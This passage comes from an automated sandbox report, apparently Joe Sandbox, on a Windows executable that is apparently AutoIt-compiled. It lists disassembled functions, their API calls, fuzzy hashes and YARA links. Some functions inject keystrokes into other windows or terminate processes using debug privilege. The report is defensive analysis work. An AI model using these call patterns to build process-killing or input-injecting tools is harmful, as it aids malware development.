                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: InvalidateRect
                                    • String ID:
                                    • API String ID: 634782764-0
                                    • Opcode ID: a5ee7e9d0871725ca43543f7726cfd1d0bfb6ceb742e3c8010e0fee28a2fdba0
                                    • Instruction ID: a3829940fd1bd415353eedacfeec32090bf9940c0bdc4cbfb41ca922ede8e156
                                    • Opcode Fuzzy Hash: a5ee7e9d0871725ca43543f7726cfd1d0bfb6ceb742e3c8010e0fee28a2fdba0
                                    • Instruction Fuzzy Hash: 3451B430714244BFDF209B28CC89FAE7BA9FB05724F604615F990E61E1CF76AA90DB51
                                    Function 00882B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 008BC2F7
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008BC319
                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008BC331
                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 008BC34F
                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008BC370
                                    • DestroyCursor.USER32(00000000), ref: 008BC37F
                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 008BC39C
                                    • DestroyCursor.USER32(?), ref: 008BC3AB
                                      • Part of subcall function 0090A4AF: DeleteObject.GDI32(00000000), ref: 0090A4E8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                                    • String ID:
                                    • API String ID: 2975913752-0
                                    • Opcode ID: deb925aecf84d1e43bb53d170d604b932ad27edec487ccd07443488313c33162
                                    • Instruction ID: e148aa32451e961c71b342c278d888248fdb0365edb6ddb9c0b26d7d2ef01912
                                    • Opcode Fuzzy Hash: deb925aecf84d1e43bb53d170d604b932ad27edec487ccd07443488313c33162
                                    • Instruction Fuzzy Hash: EF514674A10209EFDB20EF64CC45FAA7BE5FB58320F104528F902E72A0DB70AD90EB50
                                    Function 008D966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008DA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 008DA84C
                                      • Part of subcall function 008DA82C: GetCurrentThreadId.KERNEL32 ref: 008DA853
                                      • Part of subcall function 008DA82C: AttachThreadInput.USER32(00000000,?,008D9683,?,00000001), ref: 008DA85A
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 008D968E
                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008D96AB
                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 008D96AE
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 008D96B7
                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 008D96D5
                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008D96D8
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 008D96E1
                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 008D96F8
                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008D96FB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                    • String ID:
                                    • API String ID: 2014098862-0
                                    • Opcode ID: 6a64a619d4d7457ad3cdf316d5e5093193593cccfa54e656a467a73936dcd649
                                    • Instruction ID: 82b787bee3e20566f2b26fe2045aec86a267887f822155270077ecac2660eab2
                                    • Opcode Fuzzy Hash: 6a64a619d4d7457ad3cdf316d5e5093193593cccfa54e656a467a73936dcd649
                                    • Instruction Fuzzy Hash: 3E1121B1964208BEF7202F24DC89F6A3F2DEB0C751F200026F644AB1A0C9F35D40EAE4
                                    Function 008D8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,008D853C,00000B00,?,?), ref: 008D892A
                                    • RtlAllocateHeap.NTDLL(00000000,?,008D853C), ref: 008D8931
                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,008D853C,00000B00,?,?), ref: 008D8946
                                    • GetCurrentProcess.KERNEL32(?,00000000,?,008D853C,00000B00,?,?), ref: 008D894E
                                    • DuplicateHandle.KERNEL32(00000000,?,008D853C,00000B00,?,?), ref: 008D8951
                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,008D853C,00000B00,?,?), ref: 008D8961
                                    • GetCurrentProcess.KERNEL32(008D853C,00000000,?,008D853C,00000B00,?,?), ref: 008D8969
                                    • DuplicateHandle.KERNEL32(00000000,?,008D853C,00000B00,?,?), ref: 008D896C
                                    • CreateThread.KERNEL32(00000000,00000000,008D8992,00000000,00000000,00000000), ref: 008D8986
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                    • String ID:
                                    • API String ID: 1422014791-0
                                    • Opcode ID: 0c08a619e1327b1ef6e532f2897bc947290fb689c68756131701d5095f561d0b
                                    • Instruction ID: c873623f190b0d98c1924b6f2df4a15cb3ed383dd707f9c507735c1ab5fbb568
                                    • Opcode Fuzzy Hash: 0c08a619e1327b1ef6e532f2897bc947290fb689c68756131701d5095f561d0b
                                    • Instruction Fuzzy Hash: 2601BF75254304FFE760EBA5DC5DF673B6CEB89B11F404421FA05DB691CA749900DB20
                                    Function 008F9B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: NULL Pointer assignment$Not an Object type
                                    • API String ID: 0-572801152
                                    • Opcode ID: 8bfcd990383acfeaca10e5c3853b6029d4b250520ff2a4da73bfffb02e3c7927
                                    • Instruction ID: cf26c009ca133013ae227f0f7349c27364ce9f02406d5fcf542df790a650bb49
                                    • Opcode Fuzzy Hash: 8bfcd990383acfeaca10e5c3853b6029d4b250520ff2a4da73bfffb02e3c7927
                                    • Instruction Fuzzy Hash: C8C18E71A0021E9BDF10DFA8D884BBEB7F5FB48314F158569EA45EB280E770AD45CB90
                                    Function 008F9113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$_memset
                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                    • API String ID: 2862541840-625585964
                                    • Opcode ID: cc94f0d1e4406806e20258f9e36eb42ea07119a9af4f3503eddba116f1917dcd
                                    • Instruction ID: 9734928b59954253afbfd7191d19730329180a8f6289c3cce1f276200ad3a1a4
                                    • Opcode Fuzzy Hash: cc94f0d1e4406806e20258f9e36eb42ea07119a9af4f3503eddba116f1917dcd
                                    • Instruction Fuzzy Hash: 92919C31A00219ABDF24DFA5C848FAEBBB8FF85714F108159FA55EB280D7709941CFA0
                                    Function 008F975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008D710A: CLSIDFromProgID.COMBASE ref: 008D7127
                                      • Part of subcall function 008D710A: ProgIDFromCLSID.COMBASE(?,00000000), ref: 008D7142
                                      • Part of subcall function 008D710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D7044,80070057,?,?), ref: 008D7150
                                      • Part of subcall function 008D710A: CoTaskMemFree.COMBASE(00000000), ref: 008D7160
                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 008F9806
                                    • _memset.LIBCMT ref: 008F9813
                                    • _memset.LIBCMT ref: 008F9956
                                    • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000000), ref: 008F9982
                                    • CoTaskMemFree.COMBASE(?), ref: 008F998D
                                    Strings
                                    • NULL Pointer assignment, xrefs: 008F99DB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                    • String ID: NULL Pointer assignment
                                    • API String ID: 1300414916-2785691316
                                    • Opcode ID: e04d5f7b375ccfed5c4e756f52082665a2b1db6e9bd2faae855527b849c32fce
                                    • Instruction ID: 1ff2657351866c6cf25d3b0f368b3d758454809d0dfc0a10cca5e2975ee98cca
                                    • Opcode Fuzzy Hash: e04d5f7b375ccfed5c4e756f52082665a2b1db6e9bd2faae855527b849c32fce
                                    • Instruction Fuzzy Hash: C291077190022DEBDB10EFA5DC45AEEBBB9FF08310F20415AE519E7251EB719A44CFA1
                                    Function 00906D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00906E24
                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00906E38
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00906E52
                                    • _wcscat.LIBCMT ref: 00906EAD
                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00906EC4
                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00906EF2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window_wcscat
                                    • String ID: SysListView32
                                    • API String ID: 307300125-78025650
                                    • Opcode ID: 9222dddb911122623f21fecd6e9e91351e29ca2a6ba62d70e426089afcc74aee
                                    • Instruction ID: e6b6f11ce3321ac49e8d44ca20621ab425acf6dbe77e6a707b4163e3cf9f5150
                                    • Opcode Fuzzy Hash: 9222dddb911122623f21fecd6e9e91351e29ca2a6ba62d70e426089afcc74aee
                                    • Instruction Fuzzy Hash: 48419E71A00349AFEB219FA8CC85BEA77ECEF08354F10052AF584E72D1D7729D958B60
                                    Function 008FE933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008E3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 008E3C7A
                                      • Part of subcall function 008E3C55: Process32FirstW.KERNEL32(00000000,?), ref: 008E3C88
                                      • Part of subcall function 008E3C55: CloseHandle.KERNEL32(00000000), ref: 008E3D52
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008FE9A4
                                    • GetLastError.KERNEL32 ref: 008FE9B7
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008FE9E6
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 008FEA63
                                    • GetLastError.KERNEL32(00000000), ref: 008FEA6E
                                    • CloseHandle.KERNEL32(00000000), ref: 008FEAA3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                    • String ID: SeDebugPrivilege
                                    • API String ID: 2533919879-2896544425
                                    • Opcode ID: 0a6944da31f5c339c5044cba490598265e045641d17b03e33ca5cc085d3aa820
                                    • Instruction ID: 2be5d21f8b34986b737efaa28283e19b6aab188e587e2202754e0c2fbf9bd293
                                    • Opcode Fuzzy Hash: 0a6944da31f5c339c5044cba490598265e045641d17b03e33ca5cc085d3aa820
                                    • Instruction Fuzzy Hash: 634179712042059FDB24EF28CCA5F79B7A5FF54314F188419FA42DB2D2DB74A944CB92
                                    Function 008E2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadIconW.USER32(00000000,00007F03), ref: 008E3033
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: IconLoad
                                    • String ID: blank$info$question$stop$warning
                                    • API String ID: 2457776203-404129466
                                    • Opcode ID: c99ff7bfb5dace223d491681c501ad412b39b990442ee96564f35cfc08ae5953
                                    • Instruction ID: 23879b0515ea595385b64f32ddca98c549ac6fecdce46f3d9a5358ec71a1ab7c
                                    • Opcode Fuzzy Hash: c99ff7bfb5dace223d491681c501ad412b39b990442ee96564f35cfc08ae5953
                                    • Instruction Fuzzy Hash: DC1108313487C6BEE7259A1ADC46C6B779CFF17324F10006AF900E7582DAA09F4059A1
                                    Function 008E42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 008E4312
                                    • LoadStringW.USER32(00000000), ref: 008E4319
                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 008E432F
                                    • LoadStringW.USER32(00000000), ref: 008E4336
                                    • _wprintf.LIBCMT ref: 008E435C
                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008E437A
                                    Strings
                                    • %s (%d) : ==> %s: %s %s, xrefs: 008E4357
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: HandleLoadModuleString$Message_wprintf
                                    • String ID: %s (%d) : ==> %s: %s %s
                                    • API String ID: 3648134473-3128320259
                                    • Opcode ID: 5292ea87dfe831a577b8997a12b94da87eaa39e0981ccf430ebb9ca3c2a06b35
                                    • Instruction ID: abc2cfd65754d82e2e6177d93dc2940a2748f8b9c8e53cd60dce4851babacced
                                    • Opcode Fuzzy Hash: 5292ea87dfe831a577b8997a12b94da87eaa39e0981ccf430ebb9ca3c2a06b35
                                    • Instruction Fuzzy Hash: E90128F290420CBFE761ABA49D89EEB766CEB08300F0005A1BB49E2451EA759F855B71
                                    Function 00882A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,008BC1C7,00000004,00000000,00000000,00000000), ref: 00882ACF
                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,008BC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00882B17
                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,008BC1C7,00000004,00000000,00000000,00000000), ref: 008BC21A
                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,008BC1C7,00000004,00000000,00000000,00000000), ref: 008BC286
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ShowWindow
                                    • String ID:
                                    • API String ID: 1268545403-0
                                    • Opcode ID: bddd8c3f27665800d1939267297e195abfaec61d0c771e5d350f702eadb9e20a
                                    • Instruction ID: 3708ad55503a3355ed7474b0447cd264dc8e2e572a7d1ad18316094ec2558d6f
                                    • Opcode Fuzzy Hash: bddd8c3f27665800d1939267297e195abfaec61d0c771e5d350f702eadb9e20a
                                    • Instruction Fuzzy Hash: D8411634218694EFC73DAB28CC98BAF7B96FF85314F148829E057C6A61C631A841D711
                                    Function 008E70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 008E70DD
                                      • Part of subcall function 008A0DB6: std::exception::exception.LIBCMT ref: 008A0DEC
                                      • Part of subcall function 008A0DB6: __CxxThrowException@8.LIBCMT ref: 008A0E01
                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 008E7114
                                    • RtlEnterCriticalSection.NTDLL(?), ref: 008E7130
                                    • _memmove.LIBCMT ref: 008E717E
                                    • _memmove.LIBCMT ref: 008E719B
                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 008E71AA
                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008E71BF
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 008E71DE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                    • String ID:
                                    • API String ID: 256516436-0
                                    • Opcode ID: fce9ebed4c6aa178dd892d196a6d4b9adbf5a9b672b839fabb8f20272f5570ad
                                    • Instruction ID: f061fe66ba1888f39f46589423558dfb9a001f2d6187aa3ed6573f742df7d7ba
                                    • Opcode Fuzzy Hash: fce9ebed4c6aa178dd892d196a6d4b9adbf5a9b672b839fabb8f20272f5570ad
                                    • Instruction Fuzzy Hash: 96315E32904205EFDF10EFA9DC85AAAB7B8FF46710F1441A5E904EB256DB709A10DB61
                                    Function 009061D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 009061EB
                                    • GetDC.USER32(00000000), ref: 009061F3
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009061FE
                                    • ReleaseDC.USER32(00000000,00000000), ref: 0090620A
